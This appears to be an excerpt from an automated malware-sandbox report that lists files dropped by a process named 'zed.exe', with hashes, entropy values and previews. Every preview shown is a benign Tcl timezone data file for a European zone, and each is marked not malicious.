                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Dublin) {.. {-9223372036854775808 -1521 0 LMT}.. {-2821649679 -1521 0 DMT}.. {-1691962479 2079 1 IST}.. {-1680471279 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1517011200 0 0 IST}.. {-1507500000 3600 1 IST}.. {-1490565600 0 0 IST}.. {-1473631200 3600 1 IST}.. {-1460930400 0 0 IST}.. {-1442786400 3600 1 IST}.. {-1428876000 0 0 IST}.. {-1410732000 3600 1 IST}.. {-1396216800 0 0 IST}.. {-1379282400 3600 1 IST}.. {-1364767200 0 0 IST}.. {-1348437600 3600 1 IST}.. {-1333317600 0 0 IST}.. {-1315778400 3600 1 IST}.. {-1301263200 0 0 IST}.. {-1284328800 3600 1 IST}.. {-1269813600 0 0 IST}.. {-1253484000 3600 1 IST
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9509
                                                                                                                                                                                                                                            Entropy (8bit):3.8837074152297704
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QTOKVA1oCobz0W4x2+ZE74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNA:QyoCvTZ641sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:D04F8EDDA1C3611692FB91E317CCADFE
                                                                                                                                                                                                                                            SHA1:1C483FC95459EC6F1D5FE4DD275879A9EBCA1718
                                                                                                                                                                                                                                            SHA-256:0524A31131405347C1D5D86C5EE38A2064AB055C030AB3B43F25DB3B28FFD8D2
                                                                                                                                                                                                                                            SHA-512:4E2E18EBDE2765F2251B1FE41EF8E6AC79875617348974A28619F5E59EC0467239C682CCE8DEBD7A698BE2F00252C77D1F7FA50B6CAFF920B3BE53A0B836F815
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Gibraltar) {.. {-9223372036854775808 -1284 0 LMT}.. {-2821649916 0 0 GMT}.. {-1691964000 3600 1 BST}.. {-1680472800 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1507500000 3600 1 BST}.. {-1490565600 0 0 GMT}.. {-1473631200 3600 1 BST}.. {-1460930400 0 0 GMT}.. {-1442786400 3600 1 BST}.. {-1428876000 0 0 GMT}.. {-1410732000 3600 1 BST}.. {-1396216800 0 0 GMT}.. {-1379282400 3600 1 BST}.. {-1364767200 0 0 GMT}.. {-1348437600 3600 1 BST}.. {-1333317600 0 0 GMT}.. {-1315778400 3600 1 BST}.. {-1301263200 0 0 GMT}.. {-1284328800 3600 1 BST}.. {-1269813600 0 0 GMT}.. {-1253484000 3600 1 BST}.. {-1238364000 0 0 GMT}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.879252060643389
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQakQAL/yQavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/yYU
                                                                                                                                                                                                                                            MD5:07AF23DA01CB963EA9E57534E34E7704
                                                                                                                                                                                                                                            SHA1:1C4A214FF3B722E80C0ECACA0FFD5DFF302F6AE9
                                                                                                                                                                                                                                            SHA-256:F7046808A8E80B7AE449D1A49AE3E480096736B7D3F554A240C7DFB10F82076A
                                                                                                                                                                                                                                            SHA-512:713860D340C0EBA5EEF873ECB9B28CCDE9BFAD31B6A8626EF507E96585F5CC1091BF8D8A2DB7E5CB532E44F4561FBAE1797141724EF934755B69919FEA09A78A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Guernsey) $TZData(:Europe/London)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7368
                                                                                                                                                                                                                                            Entropy (8bit):3.7258352536809705
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:OsR0uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0hzj:OkyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:7FF902B06FA79F14553670A70E77FF8C
                                                                                                                                                                                                                                            SHA1:0105051541F38956EA6192BD0C7ED4047668005E
                                                                                                                                                                                                                                            SHA-256:5B5C0A9261A414EA8DC34F594EE05BEE16F695488B230857D2B569A6B603BC39
                                                                                                                                                                                                                                            SHA-512:551940199783A0FF9D73695B77B10300644F50E91D6B02FE79BB0CD4B78C7BA88CCE56F4B9408EC146361BF408F52D01A1F435183360C801EA5E219FB718247F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Helsinki) {.. {-9223372036854775808 5989 0 LMT}.. {-2890258789 5989 0 HMT}.. {-1535938789 7200 0 EET}.. {-875671200 10800 1 EEST}.. {-859773600 7200 0 EET}.. {354672000 10800 1 EEST}.. {370396800 7200 0 EET}.. {386121600 10800 1 EEST}.. {401846400 7200 0 EET}.. {410220000 7200 0 EET}.. {417574800 10800 1 EEST}.. {433299600 7200 0 EET}.. {449024400 10800 1 EEST}.. {465354000 7200 0 EET}.. {481078800 10800 1 EEST}.. {496803600 7200 0 EET}.. {512528400 10800 1 EEST}.. {528253200 7200 0 EET}.. {543978000 10800 1 EEST}.. {559702800 7200 0 EET}.. {575427600 10800 1 EEST}.. {591152400 7200 0 EET}.. {606877200 10800 1 EEST}.. {622602000 7200 0 EET}.. {638326800 10800 1 EEST}.. {654656400 7200 0 EET}.. {670381200 10800 1 EEST}.. {686106000 7200 0 EET}.. {701830800 10800 1 EEST}.. {717555600 7200 0 EET}.. {733280400 10800 1 EEST}.. {749
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.914274131294981
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQaqpfioxp8QavKLS:SlSWB9vsM3ymvKA2PHAIgovKAH6N/ycS
                                                                                                                                                                                                                                            MD5:F9A0F19FAF3131D8A70C50FF21B365B7
                                                                                                                                                                                                                                            SHA1:7FC2B5302FAD06BC4C633CD22A80A7D40073FFF8
                                                                                                                                                                                                                                            SHA-256:2F1151B0528A5325443379D4E7CCE32C00213722AD9DF764E1DC90198084B076
                                                                                                                                                                                                                                            SHA-512:6D04DF4480FE132A6641C4BF7E01936E2E4A71A3A6C2AB9F7DA7A9D8A4B836BC66EE2BB597B8C318D07A06F72C05B07E6785B53308ED9BC1103AE6DBDD0FF24E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Isle_of_Man) $TZData(:Europe/London)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3683
                                                                                                                                                                                                                                            Entropy (8bit):3.814835316757376
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:Qi0p05zvSPBUUl0ZFzo4ay0CREDcxn6nH78BV0QbCgkCPviiM0H7hdli80+j7x9L:Qiq66OFEIFMssCfMsXV3heM2MRlA0
                                                                                                                                                                                                                                            MD5:A8256656B971F58CB991BC270BF93B26
                                                                                                                                                                                                                                            SHA1:189796E1B8E29A7A7B8B0E143DD9B44BAF217AB2
                                                                                                                                                                                                                                            SHA-256:08061A80FC0F1EF375EEFE784EACDF0812E289FD67E8613BDEC36209985CA1D7
                                                                                                                                                                                                                                            SHA-512:1F11308B5BAC1F3DB75CAC7322BBEA6E51C6B4A2A3450F1DB84DE6AA127F0F1BAA7DAB409FAF1288C100BDA77DA6FA1C6E3C0BA962F9406D1445D7C9E2AA3A60
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Istanbul) {.. {-9223372036854775808 6952 0 LMT}.. {-2840147752 7016 0 IMT}.. {-1869875816 7200 0 EET}.. {-1693706400 10800 1 EEST}.. {-1680490800 7200 0 EET}.. {-1570413600 10800 1 EEST}.. {-1552186800 7200 0 EET}.. {-1538359200 10800 1 EEST}.. {-1522551600 7200 0 EET}.. {-1507514400 10800 1 EEST}.. {-1490583600 7200 0 EET}.. {-1440208800 10800 1 EEST}.. {-1428030000 7200 0 EET}.. {-1409709600 10800 1 EEST}.. {-1396494000 7200 0 EET}.. {-931053600 10800 1 EEST}.. {-922676400 7200 0 EET}.. {-917834400 10800 1 EEST}.. {-892436400 7200 0 EET}.. {-875844000 10800 1 EEST}.. {-764737200 7200 0 EET}.. {-744343200 10800 1 EEST}.. {-733806000 7200 0 EET}.. {-716436000 10800 1 EEST}.. {-701924400 7200 0 EET}.. {-684986400 10800 1 EEST}.. {-670474800 7200 0 EET}.. {-654141600 10800 1 EEST}.. {-639025200 7200 0 EET}.. {-622087200 10800 1 EEST}.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.8801202136140915
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQap6cEBx/yQavKLS:SlSWB9vsM3ymvKA2PHAIgovKAH6N/yzx
                                                                                                                                                                                                                                            MD5:FE10770868A75F4F8D76C5E23D99AA81
                                                                                                                                                                                                                                            SHA1:30AC768BA47AF7A53831F5142B58ECEC41933621
                                                                                                                                                                                                                                            SHA-256:97EB33915ED7C9C34144F8F42357FAB2262B3CD45287F3CFFD26C33D65F7651E
                                                                                                                                                                                                                                            SHA-512:1D82DF45AB0CCDFBFAD0431C668794996E01776800F34DD4131C5287D37291657A749D497AA5B0AB81CAFF3190896633FBFF456BFFEB7E93A3420AA841E54842
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Jersey) $TZData(:Europe/London)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2512
                                                                                                                                                                                                                                            Entropy (8bit):3.941165221943348
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:coNlj+X2uxhuHJkw0QqXknzaVV04v3TfdGY3kNmneVuNlh000sGpdh:coN9+1EpkwCXkSV3A8qc0
                                                                                                                                                                                                                                            MD5:104CCB93300F40BAF8F4D7CC882EFC05
                                                                                                                                                                                                                                            SHA1:EA83F3C3791BD6F083844939DC405B248E738FE3
                                                                                                                                                                                                                                            SHA-256:2387D26DF5429DF9867F42F7D4F872DC146643B4B3CC57DA7298C18561DE8BFE
                                                                                                                                                                                                                                            SHA-512:12724C5BBEE0835626A98B66BF55C3DF1311F07018C70D76FC5C50E7E7BA5C4A9F064D9EDC376CC3B06C4FFFECA3FAF5B66948615A03DFECA7C361E326D950EA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kaliningrad) {.. {-9223372036854775808 4920 0 LMT}.. {-2422056120 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-780368400 7200 0 EET}.. {-778730400 10800 1 EEST}.. {-762663600 7200 0 EET}.. {-749095200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                                                            Entropy (8bit):4.970386708540243
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQaoM2EBUQaocqn:SlSWB9vsM3ym5HAIgoiAN/yOEBUC
                                                                                                                                                                                                                                            MD5:74ACF46A3248341CFD84B1592F884A8F
                                                                                                                                                                                                                                            SHA1:888FBB54381A1B5BC19E65AF38A1913635A8E7E4
                                                                                                                                                                                                                                            SHA-256:05C55F87182F0D5D3E8E6C1F9164EDDBDB8035146A0955C04283BC1347D45B30
                                                                                                                                                                                                                                            SHA-512:21A752390E023CBD582BC43865D43458B44B036299A2373948269196071742ED7EB6067DD9A288F3A15E808B452FE4192750FAE813F70738FAB0C866219D57CB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Kiev) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2029
                                                                                                                                                                                                                                            Entropy (8bit):3.668326642402654
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:FFvCAs6kKR6aQmF1cSNWrI+AjXgV/Ap40FjDM:FhCAs6kC6aZF1cSN4I+AjXgV/ApDFjDM
                                                                                                                                                                                                                                            MD5:57BB199152815B12FE4491C92FE25186
                                                                                                                                                                                                                                            SHA1:7BC5ECDE9EFADE812AF40CB92CCE5323FB57C78D
                                                                                                                                                                                                                                            SHA-256:60884D4B8B17A9AB8FB5697DA95F62E570755348109C661D783D56CD047BBE9E
                                                                                                                                                                                                                                            SHA-512:2043FDBA860E8F6578F7E26A80C7787B82C7D15188327923EC36D153FDF9BEEAE063012ACE4309B76DB9DBA2DFFB7404DE370BA85023CCE93159FCAD3B9B92B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kirov) {.. {-9223372036854775808 11928 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {78044
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7455
                                                                                                                                                                                                                                            Entropy (8bit):3.7624983280224953
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:vC1LyEpkv8V3MpaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb4:vC9VW0bivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:F37C7529B53C4C158341AF90F80C3A11
                                                                                                                                                                                                                                            SHA1:210650A882350D35C72A934749F276C58C572DFA
                                                                                                                                                                                                                                            SHA-256:591264F69DB19DDCDC90E704525E2D3D3984117B710F482F19DA8F88628EE6A7
                                                                                                                                                                                                                                            SHA-512:F23B0C5251EB7418A1C80344AB7623D2A0197E681E3B7D152E416187BF66DE09A7A60A65F8ED6A810272CF0C253D63684F08AF594A8C22ABEA89E3BBADC8F0A0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kyiv) {.. {-9223372036854775808 7324 0 LMT}.. {-2840148124 7324 0 KMT}.. {-1441159324 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-892522800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-825382800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {638319600 14400 1 MSD}.. {646786800 10800 1 EEST}.. {686102400 7200 0 EET}.. {701827200 10800 1 EEST}.. {7175
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9878
                                                                                                                                                                                                                                            Entropy (8bit):3.8275310275285723
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:j76abXsyZLEjx82YbtIaFF1w0us4qE3+sSGjT:j77bXsyZLEjx82atysLE3+sSGjT
                                                                                                                                                                                                                                            MD5:0DA331C2A815739E6758797BD24554EA
                                                                                                                                                                                                                                            SHA1:3829C441E908BEFDC4ED6AB65FD4ACD0C97D5E1B
                                                                                                                                                                                                                                            SHA-256:9FAC9812411F88014779D34722F3E0D2750E45BF21595DF1AE14CB9CCFD3F33F
                                                                                                                                                                                                                                            SHA-512:FEBBA05F64AC1F3066AF6351493DD89768154FD171D447503DAEDB90D16858BEDBCE4A74E24AC0C37B5FF191692AF44AADDE4A92E752F88C48DA646352AD9A0B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Lisbon) {.. {-9223372036854775808 -2205 0 LMT}.. {-2713908195 -2205 0 LMT}.. {-1830384000 0 0 WET}.. {-1689555600 3600 1 WEST}.. {-1677801600 0 0 WET}.. {-1667437200 3600 1 WEST}.. {-1647738000 0 0 WET}.. {-1635814800 3600 1 WEST}.. {-1616202000 0 0 WET}.. {-1604365200 3600 1 WEST}.. {-1584666000 0 0 WET}.. {-1572742800 3600 1 WEST}.. {-1553043600 0 0 WET}.. {-1541206800 3600 1 WEST}.. {-1521507600 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1426813200 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301274000 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269824400 0 0 WET}.. {-1221440400 3600 1 WEST}.. {-1206925200 0 0 WET}.. {-1191200400 3600 1 WEST}.. {-1175475600 0 0 WET}.. {-1127696400 3600 1 WEST}.. {-1111971600 0 0 WET}.. {-1096851
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.948438246006353
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQavPSJ5Qahs0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNl
                                                                                                                                                                                                                                            MD5:56C6C95484FEAF9BAF755683E7417B58
                                                                                                                                                                                                                                            SHA1:A43176BEBC5B4D7144A7E1109E0AAEFD95C21EC6
                                                                                                                                                                                                                                            SHA-256:713A842197516D618F2D86977262542A1CA334D7DF6026539FA2F2980DBF4CD3
                                                                                                                                                                                                                                            SHA-512:566B6DF2D76A8A4D3405C4785C7A471A23D65CD8838831BD0DEDF5BF194E8A3B304CA9920CB4A8EC9D6CD60EAA9BE0335E38D9547A4D23C7E4E5E5A39A09DDAC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Ljubljana) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10211
                                                                                                                                                                                                                                            Entropy (8bit):3.826887992237191
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:GNoCvTZtcf80KYiK3BG0Myj9TYQOeMAwbccM0Fp:GNNTZtcf15iOBG08eNwbccM0Fp
                                                                                                                                                                                                                                            MD5:0625C99E16D3C956DED1C0C0F867DEC3
                                                                                                                                                                                                                                            SHA1:6ACDF0DB619B63E21EC89046B9320A85FBD3397A
                                                                                                                                                                                                                                            SHA-256:D04C4E25DF4DE1C1CFE1EF84B3B6DD746CF08A271AB0958F22C7D580A3ED10E6
                                                                                                                                                                                                                                            SHA-512:07AC42F0635DF01CC0AFD13F9668B143D4943BA0E4C377D254B5AF034D9DDBAB77BA813187E9AB73D2EEAD86EBAA26DC15599FD74FC82EEF287F5A6AB9C01635
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/London) {.. {-9223372036854775808 -75 0 LMT}.. {-3852662325 0 0 GMT}.. {-1691964000 3600 1 BST}.. {-1680472800 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1507500000 3600 1 BST}.. {-1490565600 0 0 GMT}.. {-1473631200 3600 1 BST}.. {-1460930400 0 0 GMT}.. {-1442786400 3600 1 BST}.. {-1428876000 0 0 GMT}.. {-1410732000 3600 1 BST}.. {-1396216800 0 0 GMT}.. {-1379282400 3600 1 BST}.. {-1364767200 0 0 GMT}.. {-1348437600 3600 1 BST}.. {-1333317600 0 0 GMT}.. {-1315778400 3600 1 BST}.. {-1301263200 0 0 GMT}.. {-1284328800 3600 1 BST}.. {-1269813600 0 0 GMT}.. {-1253484000 3600 1 BST}.. {-1238364000 0 0 GMT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):191
                                                                                                                                                                                                                                            Entropy (8bit):4.920751023999728
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/So3vXHAIgoq82yHRL/yQavQLHKQX9J8QahCv:SlSWB9vsM3ymhS2HAIgoh26N/y1QzKQt
                                                                                                                                                                                                                                            MD5:E4A8C25756D6C5D2073A51D2B54E3A0C
                                                                                                                                                                                                                                            SHA1:4A24667ADC9BD31E8CB298BE3787C12301C3F1C8
                                                                                                                                                                                                                                            SHA-256:8C0486A5B235E8B01069420976E1B8D08D77A4BEF587203AF1B68D7B5333546E
                                                                                                                                                                                                                                            SHA-512:F3593C3B75C9DA931FB39BC2054EB9691C3A544A74F871425169C3244040D6D060510741FE1E352A1E59F53E5A585307D434A0D7C9D159D065717E78C807787C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Brussels)]} {.. LoadTimeZoneFile Europe/Brussels..}..set TZData(:Europe/Luxembourg) $TZData(:Europe/Brussels)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8517
                                                                                                                                                                                                                                            Entropy (8bit):3.8326167134909177
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:k5m01LdXKc0TJp+bwS274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOn:+DaNVLSs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:63263380F57B756A1DFA3796E4188CD3
                                                                                                                                                                                                                                            SHA1:8EEE707AC4FEA1C098C81AC2D289A46239121A5E
                                                                                                                                                                                                                                            SHA-256:5337C9843C56DEEC6B91C4468C76EC1C896E80421B72B583B69DE5579063E09A
                                                                                                                                                                                                                                            SHA-512:ACA4830020715C471741E27EB2292ACF002D2CD7EDCD1061978B64967EB447F61AA095F960D8A75A01B9B87558D83FF409F30BDACA83E063024F1E2381FA64C4
                                                                                                                                                                                                                                            Malicious:false
